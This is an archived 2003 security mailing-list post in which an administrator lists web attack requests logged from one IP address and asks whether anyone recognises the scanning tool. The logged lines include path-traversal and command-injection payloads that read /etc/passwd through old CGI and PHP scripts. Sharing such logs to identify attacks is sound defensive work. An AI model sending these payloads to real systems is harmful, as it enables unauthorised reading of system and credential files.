Chinese source: some web attack tool

From: Paul (pbobbyat_private)
Date: Fri Mar 21 2003 - 14:14:50 PST

Next message: Tobias Lachmann: "AW: Chinese source: some web attack tool"

Previous message: Kris Saw: "Re: Trojan attacking our switches"
Next in thread: Tobias Lachmann: "AW: Chinese source: some web attack tool"
Reply: Tobias Lachmann: "AW: Chinese source: some web attack tool"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) Getting hammered by a Chinese site, 218.88.98.237. Anyone else? They are web attacks, and here is a sample of the various attempts it tries to make: GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd% 00 HTTP/1.0 GET /IISSamples/ExAir/search/query.asp HTTP/1.0 GET /cgi-bin/sh HTTP/1.0 GET /directory.php?dir=%3Bmore%20/etc/passwd HTTP/1.0 GET /search.dll?search?query=%00&logic=AND HTTP/1.0 GET /cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0 and so forth. Anyone recognize the tool? ---------------------------------------------------------------------------- <Pre>Lose another weekend managing your IDS? Take back your personal time. 15-day free trial of StillSecure Border Guard.</Pre> <A href="http://www.securityfocus.com/stillsecure"> http://www.securityfocus.com/stillsecure </A>

Next message: Tobias Lachmann: "AW: Chinese source: some web attack tool"
Previous message: Kris Saw: "Re: Trojan attacking our switches"
Next in thread: Tobias Lachmann: "AW: Chinese source: some web attack tool"
Reply: Tobias Lachmann: "AW: Chinese source: some web attack tool"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Mar 22 2003 - 12:23:48 PST